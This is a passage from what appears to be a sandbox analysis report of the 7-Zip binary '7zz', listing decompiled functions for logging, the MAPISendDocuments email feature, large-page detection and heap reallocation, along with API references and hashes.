                                                                      0x0041cc65
                                                                      0x0041cc68
                                                                      0x0041cc75
                                                                      0x0041cc78
                                                                      0x0041cc7a
                                                                      0x0041cc83
                                                                      0x0041cc8a
                                                                      0x0041cc90
                                                                      0x0041cce5
                                                                      0x0041cc9e
                                                                      0x0041ccab
                                                                      0x0041ccb0
                                                                      0x0041ccbb
                                                                      0x0041ccbf
                                                                      0x0041ccc2
                                                                      0x0041ccc5
                                                                      0x0041cccb
                                                                      0x0041ccd4
                                                                      0x0041ccd9
                                                                      0x0041ccd9
                                                                      0x0041ccb0
                                                                      0x0041cc90
                                                                      0x0041cc8a
                                                                      0x0041ccf8
                                                                      0x0041cd01

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: B$Z$h
                                                                      • API String ID: 3519838083-418080759
                                                                      • Opcode ID: e27ca44641f6d3a39d7cf6b47e3b5a49e6ed396509ae319c0575fe9804f9460e
                                                                      • Instruction ID: 95da72c9e758c624e4a23e77763632c46c0b47913da8fea83fca01b435c30606
                                                                      • Opcode Fuzzy Hash: e27ca44641f6d3a39d7cf6b47e3b5a49e6ed396509ae319c0575fe9804f9460e
                                                                      • Instruction Fuzzy Hash: 3621C771640604FFDB20CF24CC81BEE7BA4BF45B04F14451EF906AB281E3B4AA44C795
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004065F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 94%
                                                                      			E004065F1(void* __ecx) {
				intOrPtr* _t29;
				void* _t32;
				void* _t47;
				void* _t53;

				E0046B890(E00473548, _t53);
				_t47 = __ecx;
				 *(_t53 - 0x10) = 0x490a88;
				EnterCriticalSection(0x490a88);
				 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
				E00415C6D(_t47 + 0x60,  *((intOrPtr*)(_t53 + 0xc)));
				E00403532(_t53 - 0x1c,  *((intOrPtr*)(_t53 + 8)));
				_push(_t53 - 0x1c);
				 *(_t53 - 4) = 1;
				E00406796(_t47 + 0x4c);
				 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
				E00407A18( *((intOrPtr*)(_t53 - 0x1c)));
				_t48 = _t47 + 8;
				E00406000(_t47 + 8);
				E004060BD(_t48);
				E0040608D(_t48, "WARNING: ");
				_t29 = E00404B09(_t53 - 0x1c,  *((intOrPtr*)(_t53 + 0xc)));
				 *(_t53 - 4) = 2;
				E004060A5(_t48,  *_t29);
				E00407A18( *((intOrPtr*)(_t53 - 0x1c)));
				LeaveCriticalSection(0x490a88);
				_t32 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t32;
			}







                                                                      0x004065f6
                                                                      0x00406605
                                                                      0x00406608
                                                                      0x0040660b
                                                                      0x00406614
                                                                      0x0040661b
                                                                      0x00406626
                                                                      0x00406631
                                                                      0x00406632
                                                                      0x00406636
                                                                      0x0040663e
                                                                      0x00406642
                                                                      0x00406648
                                                                      0x0040664d
                                                                      0x00406654
                                                                      0x00406660
                                                                      0x0040666b
                                                                      0x00406674
                                                                      0x00406678
                                                                      0x00406680
                                                                      0x00406687
                                                                      0x00406692
                                                                      0x00406695
                                                                      0x0040669d

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 004065F6
                                                                      • EnterCriticalSection.KERNEL32(00490A88), ref: 0040660B
                                                                        • Part of subcall function 00406796: __EH_prolog.LIBCMT ref: 0040679B
                                                                        • Part of subcall function 00404B09: __EH_prolog.LIBCMT ref: 00404B0E
                                                                      • LeaveCriticalSection.KERNEL32(00490A88,?,?,?), ref: 00406687
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog$CriticalSection$EnterLeave
                                                                      • String ID: WARNING:
                                                                      • API String ID: 2490926211-3509524770
                                                                      • Opcode ID: e677357eb5a156d3394904b572896e19ad0289c2689fd6f0e6c99c1e536d9e68
                                                                      • Instruction ID: 4da438c53a722fe7a77adf22add2750a6654a71b2c88e06f60811bef9031d0d9
                                                                      • Opcode Fuzzy Hash: e677357eb5a156d3394904b572896e19ad0289c2689fd6f0e6c99c1e536d9e68
                                                                      • Instruction Fuzzy Hash: 95118F31E00149ABDB05FF65D846BEDBB79AF90318F10802EF406772D2DB7C1A159B9A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041AA2D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 93%
                                                                      			E0041AA2D(void* __ebx, void* __ecx, void* __edx, void* __edi) {
				void* _t121;
				void* _t124;

				E0046B8F4(0, 0);
				__eax = GetProcAddress( *(__ebp + 0x14), "MAPISendDocuments");
				__eflags = __eax - __ebx;
				 *(__ebp + 8) = __eax;
				if(__eax != __ebx) {
					__ecx = __ebp - 0x138;
					__eax = E0041B927(__ebp - 0x138);
					__eflags =  *((intOrPtr*)(__esi + 0x20)) - __ebx;
					 *(__ebp - 4) = 0x28;
					 *(__ebp + 0xc) = __ebx;
					if(__eflags <= 0) {
						L8:
						__ecx = __ebp - 0x168;
						__eax = E0041B838(__ebp - 0x168, __edi, __eflags);
						__esi = 0;
						__eflags =  *((intOrPtr*)(__ebp - 0x130)) - __ebx;
						 *(__ebp - 4) = 0x2b;
						if( *((intOrPtr*)(__ebp - 0x130)) > __ebx) {
							do {
								__eax =  *(__ebp - 0x12c);
								__ecx = __ebp - 0x144;
								__eax = E004039C0(__ebp - 0x144,  *((intOrPtr*)( *(__ebp - 0x12c) + __esi * 4)));
								__edx = __ebp - 0x144;
								__ecx = __ebp - 0xec;
								 *(__ebp - 4) = 0x2c;
								__eax = E00408963(__ebp - 0x144);
								__edx = __ebp - 0x144;
								__ecx = __ebp - 0x150;
								 *(__ebp - 4) = 0x2d;
								__eax = E0041AE3F();
								__edx = __ebp - 0xec;
								__ecx = __ebp - 0x15c;
								 *(__ebp - 4) = 0x2e;
								__eax = E0041AE3F();
								 *(__ebp - 4) = 0x2f;
								 *(__ebp + 8)(__ebx, ";",  *(__ebp - 0x150),  *(__ebp - 0x15c), __ebx) = E00407A18( *(__ebp - 0x15c));
								E00407A18( *(__ebp - 0x150)) = E00407A18( *(__ebp - 0xec));
								 *(__ebp - 4) = 0x2b;
								__eax = E00407A18( *(__ebp - 0x144));
								__esi = __esi + 1;
								__eflags = __esi -  *((intOrPtr*)(__ebp - 0x130));
							} while (__esi <  *((intOrPtr*)(__ebp - 0x130)));
						}
						__ecx = __ebp - 0x168;
						 *(__ebp - 4) = 0x28;
						__eax = E0041B875(__ebp - 0x168);
						__ecx = __ebp - 0x138;
						 *(__ebp - 4) = 0x27;
						__eax = E004036A1(__ebp - 0x138);
						__ecx = __ebp + 0x14;
						 *(__ebp - 4) = 0x15;
						__eax = E0040960A(__ebp + 0x14);
						__ecx = __ebp - 0x4c;
						 *(__ebp - 4) = 0x11;
						__eax = E0041BA22(__ebp - 0x4c);
						__ecx = __ebp - 0x78;
						 *(__ebp - 4) = 0x10;
						__eax = E0041AE89(__ebp - 0x78);
						__ecx = __ebp - 0x88;
						 *(__ebp - 4) = 0xf;
						E0041AE59(__ebp - 0x88) = E00407A18( *((intOrPtr*)(__ebp - 0x38)));
						 *(__ebp - 4) = 4;
						__ecx = __ebp - 0x1b8;
						E004102DF(__ebp - 0x1b8, __eflags) = E00407A18( *((intOrPtr*)(__ebp - 0x2c)));
						 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
						__ecx = __ebp - 0x124;
						E00403411(__ebp - 0x124) = 0;
						__eflags = 0;
					} else {
						while(1) {
							__eax =  *(__esi + 0x24);
							__ecx =  *(__ebp + 0xc);
							__eax =  *( *(__esi + 0x24) +  *(__ebp + 0xc) * 4);
							__ecx = __ebp - 0x20;
							__ebx =  *( *(__esi + 0x24) +  *(__ebp + 0xc) * 4) + 0xc;
							E0040351A(__ebp - 0x20) = __ebp - 0xec;
							__ecx =  *( *(__esi + 0x24) +  *(__ebp + 0xc) * 4) + 0xc;
							_push(__ebp - 0xec);
							 *(__ebp - 4) = 0x29;
							__eax = E0041ACE8( *( *(__esi + 0x24) +  *(__ebp + 0xc) * 4) + 0xc, __edx, __eflags);
							__eax =  *__eax;
							__edx = __ebp - 0x20;
							__ecx = __eax;
							 *(__ebp - 4) = 0x2a;
							__eax = E0040A5AF();
							 *(__ebp - 4) = 0x29;
							asm("sbb bl, bl");
							__eax = E00407A18( *(__ebp - 0xec));
							__eflags =  ~__al + 1;
							if( ~__al + 1 != 0) {
								break;
							}
							__eax = __ebp - 0x20;
							__ecx = __ebp - 0x138;
							_push(__ebp - 0x20);
							__eax = E00406796(__ebp - 0x138);
							 *(__ebp - 4) = 0x28;
							__eax = E00407A18( *(__ebp - 0x20));
							 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
							__eax =  *(__ebp + 0xc);
							__eflags =  *(__ebp + 0xc) -  *((intOrPtr*)(__esi + 0x20));
							if( *(__ebp + 0xc) <  *((intOrPtr*)(__esi + 0x20))) {
								continue;
							} else {
								__ebx = 0;
								__eflags = 0;
								goto L8;
							}
							goto L12;
						}
						__eax = GetLastError();
						__ecx =  &(__edi[7]);
						 *__edi = __eax;
						E00403593( &(__edi[7]), L"GetFullPathName error") = E00407A18( *(__ebp - 0x20));
						 *(__ebp - 4) = 0x27;
						__ecx = __ebp - 0x138;
						__eax = E004036A1(__ecx);
						goto L14;
					}
				} else {
					 *__edi = GetLastError();
					_push(L"7-Zip cannot find MAPISendDocuments function");
					E00403593(__edi + 0x1c);
					L14:
					 *(_t121 - 4) = 0x15;
					E0040960A(_t121 + 0x14);
					 *(_t121 - 4) = 0x11;
					E0041BA22(_t121 - 0x4c);
					 *(_t121 - 4) = 0x10;
					E0041AE89(_t121 - 0x78);
					 *(_t121 - 4) = 0xf;
					E0041AE59(_t121 - 0x88);
					E00407A18( *((intOrPtr*)(_t121 - 0x38)));
					 *(_t121 - 4) = 4;
					E004102DF(_t121 - 0x1b8, _t124);
					E00407A18( *((intOrPtr*)(_t121 - 0x2c)));
					 *(_t121 - 4) =  *(_t121 - 4) | 0xffffffff;
					E00403411(_t121 - 0x124);
				}
				L12:
				 *[fs:0x0] =  *((intOrPtr*)(_t121 - 0xc));
				return 0x80004005;
			}





                                                                      0x0041aa31
                                                                      0x0041aa3e
                                                                      0x0041aa44
                                                                      0x0041aa46
                                                                      0x0041aa49
                                                                      0x0041aa5a
                                                                      0x0041aa60
                                                                      0x0041aa65
                                                                      0x0041aa68
                                                                      0x0041aa6c
                                                                      0x0041aa6f
                                                                      0x0041aaf0
                                                                      0x0041aaf0
                                                                      0x0041aaf6
                                                                      0x0041aafb
                                                                      0x0041aafd
                                                                      0x0041ab03
                                                                      0x0041ab07
                                                                      0x0041ab0d
                                                                      0x0041ab0d
                                                                      0x0041ab13
                                                                      0x0041ab1c
                                                                      0x0041ab21
                                                                      0x0041ab27
                                                                      0x0041ab2d
                                                                      0x0041ab31
                                                                      0x0041ab36
                                                                      0x0041ab3c
                                                                      0x0041ab42
                                                                      0x0041ab46
                                                                      0x0041ab4b
                                                                      0x0041ab51
                                                                      0x0041ab57
                                                                      0x0041ab5b
                                                                      0x0041ab61
                                                                      0x0041ab80
                                                                      0x0041ab96
                                                                      0x0041aba1
                                                                      0x0041aba5
                                                                      0x0041abad
                                                                      0x0041abae
                                                                      0x0041abae
                                                                      0x0041ab0d
                                                                      0x0041abba
                                                                      0x0041abc0
                                                                      0x0041abc4
                                                                      0x0041abc9
                                                                      0x0041abcf
                                                                      0x0041abd3
                                                                      0x0041abd8
                                                                      0x0041abdb
                                                                      0x0041abdf
                                                                      0x0041abe4
                                                                      0x0041abe7
                                                                      0x0041abeb
                                                                      0x0041abf0
                                                                      0x0041abf3
                                                                      0x0041abf7
                                                                      0x0041abfc
                                                                      0x0041ac02
                                                                      0x0041ac0e
                                                                      0x0041ac14
                                                                      0x0041ac18
                                                                      0x0041ac26
                                                                      0x0041ac2b
                                                                      0x0041ac30
                                                                      0x0041ac3b
                                                                      0x0041ac3b
                                                                      0x0041aa71
                                                                      0x0041aa71
                                                                      0x0041aa71
                                                                      0x0041aa74
                                                                      0x0041aa77
                                                                      0x0041aa7a
                                                                      0x0041aa7d
                                                                      0x0041aa85
                                                                      0x0041aa8b
                                                                      0x0041aa8d
                                                                      0x0041aa8e
                                                                      0x0041aa92
                                                                      0x0041aa97
                                                                      0x0041aa99
                                                                      0x0041aa9c
                                                                      0x0041aa9e
                                                                      0x0041aaa2
                                                                      0x0041aaa9
                                                                      0x0041aab5
                                                                      0x0041aab9
                                                                      0x0041aabe
                                                                      0x0041aac1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041aac7
                                                                      0x0041aaca
                                                                      0x0041aad0
                                                                      0x0041aad1
                                                                      0x0041aad6
                                                                      0x0041aadd
                                                                      0x0041aae2
                                                                      0x0041aae6
                                                                      0x0041aae9
                                                                      0x0041aaec
                                                                      0x00000000
                                                                      0x0041aaee
                                                                      0x0041aaee
                                                                      0x0041aaee
                                                                      0x00000000
                                                                      0x0041aaee
                                                                      0x00000000
                                                                      0x0041aaec
                                                                      0x0041ac4e
                                                                      0x0041ac54
                                                                      0x0041ac57
                                                                      0x0041ac66
                                                                      0x0041ac6c
                                                                      0x0041ac70
                                                                      0x0041ac76
                                                                      0x00000000
                                                                      0x0041ac76
                                                                      0x0041aa4b
                                                                      0x0041aa51
                                                                      0x0041aa53
                                                                      0x0041aa23
                                                                      0x0041ac7b
                                                                      0x0041ac7e
                                                                      0x0041ac82
                                                                      0x0041ac8a
                                                                      0x0041ac8e
                                                                      0x0041ac96
                                                                      0x0041ac9a
                                                                      0x0041aca5
                                                                      0x0041aca9
                                                                      0x0041acb1
                                                                      0x0041acb7
                                                                      0x0041acc1
                                                                      0x0041acc9
                                                                      0x0041acce
                                                                      0x0041acd9
                                                                      0x0041acde
                                                                      0x0041ac3d
                                                                      0x0041ac42
                                                                      0x0041ac4b

                                                                      APIs
                                                                        • Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922
                                                                      • GetProcAddress.KERNEL32(?,MAPISendDocuments), ref: 0041AA3E
                                                                      • GetLastError.KERNEL32 ref: 0041AA4B
                                                                        • Part of subcall function 0040960A: FreeLibrary.KERNEL32(00000000,?,0040963A,?,?,00409660,00000000), ref: 00409614
                                                                        • Part of subcall function 0041BA22: __EH_prolog.LIBCMT ref: 0041BA27
                                                                        • Part of subcall function 0041AE89: __EH_prolog.LIBCMT ref: 0041AE8E
                                                                        • Part of subcall function 0041AE59: __EH_prolog.LIBCMT ref: 0041AE5E
                                                                        • Part of subcall function 004102DF: __EH_prolog.LIBCMT ref: 004102E4
                                                                        • Part of subcall function 00403411: __EH_prolog.LIBCMT ref: 00403416
                                                                      Strings
                                                                      • MAPISendDocuments, xrefs: 0041AA36
                                                                      • 7-Zip cannot find MAPISendDocuments function, xrefs: 0041AA53
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog$AddressErrorExceptionFreeLastLibraryProcRaise
                                                                      • String ID: 7-Zip cannot find MAPISendDocuments function$MAPISendDocuments
                                                                      • API String ID: 2771415571-2393093766
                                                                      • Opcode ID: 436d9d764f620074e47213211ef523a00970a49056743576426d4f87afc21c29
                                                                      • Instruction ID: 292e67d6ab7125016d89913b4f1d38c64d53d2453e5fd5feb3a7f6d712afac38
                                                                      • Opcode Fuzzy Hash: 436d9d764f620074e47213211ef523a00970a49056743576426d4f87afc21c29
                                                                      • Instruction Fuzzy Hash: AA11C130905248EADB01EFA4D9457DCBB70AF15358F2044AFE106731D2DB781A98DB6B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00471F76 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InterlockedIncrement.KERNEL32(00496224), ref: 00471F9C
                                                                      • InterlockedDecrement.KERNEL32(00496224), ref: 00471FB1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: Interlocked$DecrementIncrement
                                                                      • String ID: $bI
                                                                      • API String ID: 2172605799-2563688255
                                                                      • Opcode ID: 14794fd947a66a7e740a79147c95f718189372345e86d1cd971f01589f6869bf
                                                                      • Instruction ID: f620e85f8d82dfbac1e457229ba36f5d0a3130eb6314d64e12aaba347fa3cd4d
                                                                      • Opcode Fuzzy Hash: 14794fd947a66a7e740a79147c95f718189372345e86d1cd971f01589f6869bf
                                                                      • Instruction Fuzzy Hash: 0BF0C232105242ABE720BFAEACC5DDB6795FB91719F10883FF008851A0D7689985951E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00470DBD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 16%
                                                                      			E00470DBD(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t19;

				InterlockedIncrement(0x496224);
				_t19 =  *0x496220; // 0x0
				if(_t19 != 0) {
					InterlockedDecrement(0x496224);
					E0046E56A(0x13);
					_push(1);
					_pop(0);
				}
				_a8 = E00470E16(_a4, _a8);
				if(0 == 0) {
					InterlockedDecrement(0x496224);
				} else {
					E0046E5CB(0x13);
				}
				return _a8;
			}




                                                                      0x00470dc9
                                                                      0x00470dd7
                                                                      0x00470ddd
                                                                      0x00470de0
                                                                      0x00470de4
                                                                      0x00470dea
                                                                      0x00470dec
                                                                      0x00470dec
                                                                      0x00470df9
                                                                      0x00470dff
                                                                      0x00470e0c
                                                                      0x00470e01
                                                                      0x00470e03
                                                                      0x00470e08
                                                                      0x00470e15

                                                                      APIs
                                                                      • InterlockedIncrement.KERNEL32(00496224), ref: 00470DC9
                                                                      • InterlockedDecrement.KERNEL32(00496224), ref: 00470DE0
                                                                        • Part of subcall function 0046E56A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5A7
                                                                        • Part of subcall function 0046E56A: EnterCriticalSection.KERNEL32(?,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5C2
                                                                      • InterlockedDecrement.KERNEL32(00496224), ref: 00470E0C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: Interlocked$CriticalDecrementSection$EnterIncrementInitialize
                                                                      • String ID: $bI
                                                                      • API String ID: 2038102319-2563688255
                                                                      • Opcode ID: efb15d606f5e44fd71a55acc674efbc2999dbd389be6925d70f36fac0792ac87
                                                                      • Instruction ID: a29c1fd973d67cf1eab9a1632a1b120ecfaf970aee40f0b8d32a81a5239f5549
                                                                      • Opcode Fuzzy Hash: efb15d606f5e44fd71a55acc674efbc2999dbd389be6925d70f36fac0792ac87
                                                                      • Instruction Fuzzy Hash: AAF0B436102119FEEB102B96AC419CF7798EF44728F11843FF508491519B745A818999
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00458600 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 58%
                                                                      			E00458600() {
				signed int _t4;

				_t4 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetLargePageMinimum");
				if(_t4 != 0) {
					_t4 =  *_t4();
					if(_t4 != 0) {
						_t1 = _t4 - 1; // -1
						if((_t4 & _t1) == 0) {
							 *0x491560 = _t4;
							return _t4;
						}
					}
				}
				return _t4;
			}




                                                                      0x00458611
                                                                      0x00458619
                                                                      0x0045861b
                                                                      0x0045861f
                                                                      0x00458621
                                                                      0x00458626
                                                                      0x00458628
                                                                      0x00000000
                                                                      0x00458628
                                                                      0x00458626
                                                                      0x0045861f
                                                                      0x0045862d

                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetLargePageMinimum,00403B70,?,?,00000000,00000001,00000000), ref: 0045860A
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00458611
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: GetLargePageMinimum$kernel32.dll
                                                                      • API String ID: 1646373207-2515562745
                                                                      • Opcode ID: e945a4318dcfde84d8dda7067848fc9038098bba741c81babacb23e338e356e1
                                                                      • Instruction ID: 187617de4669a97dd730b08bbbb79d285659c800799f683955411e203a0e4393
                                                                      • Opcode Fuzzy Hash: e945a4318dcfde84d8dda7067848fc9038098bba741c81babacb23e338e356e1
                                                                      • Instruction Fuzzy Hash: C4D0C7F0741316569B145BB15C4C77F3654AB94743B4444BF6806D1191EF29D504CB1D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0046C94A Relevance: 6.5, APIs: 5, Instructions: 278COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 68%
                                                                      			E0046C94A(void* _a4, long _a8) {
				signed int _v8;
				intOrPtr _v20;
				long _v36;
				void* _v40;
				intOrPtr _v44;
				char _v48;
				long _v52;
				long _v56;
				char _v60;
				intOrPtr _t56;
				void* _t57;
				long _t58;
				long _t59;
				long _t63;
				long _t66;
				long _t68;
				long _t71;
				long _t72;
				long _t74;
				long _t78;
				intOrPtr _t80;
				void* _t83;
				long _t85;
				long _t88;
				void* _t89;
				long _t91;
				intOrPtr _t93;
				void* _t97;
				void* _t104;
				long _t113;
				long _t116;
				intOrPtr _t122;
				void* _t123;

				_push(0xffffffff);
				_push(0x47c878);
				_push(E0046CE74);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t122;
				_t123 = _t122 - 0x28;
				_t97 = _a4;
				_t113 = 0;
				if(_t97 != 0) {
					_t116 = _a8;
					__eflags = _t116;
					if(_t116 != 0) {
						_t56 =  *0x496584; // 0x1
						__eflags = _t56 - 3;
						if(_t56 != 3) {
							__eflags = _t56 - 2;
							if(_t56 != 2) {
								while(1) {
									_t57 = 0;
									__eflags = _t116 - 0xffffffe0;
									if(_t116 <= 0xffffffe0) {
										__eflags = _t116 - _t113;
										if(_t116 == _t113) {
											_t116 = 1;
										}
										_t116 = _t116 + 0x0000000f & 0xfffffff0;
										__eflags = _t116;
										_t57 = HeapReAlloc( *0x496580, _t113, _t97, _t116);
									}
									__eflags = _t57 - _t113;
									if(_t57 != _t113) {
										goto L64;
									}
									__eflags =  *0x493730 - _t113; // 0x0
									if(__eflags == 0) {
										goto L64;
									}
									_t58 = E0046E8D6(_t116);
									__eflags = _t58;
									if(_t58 != 0) {
										continue;
									}
									goto L63;
								}
								goto L64;
							}
							__eflags = _t116 - 0xffffffe0;
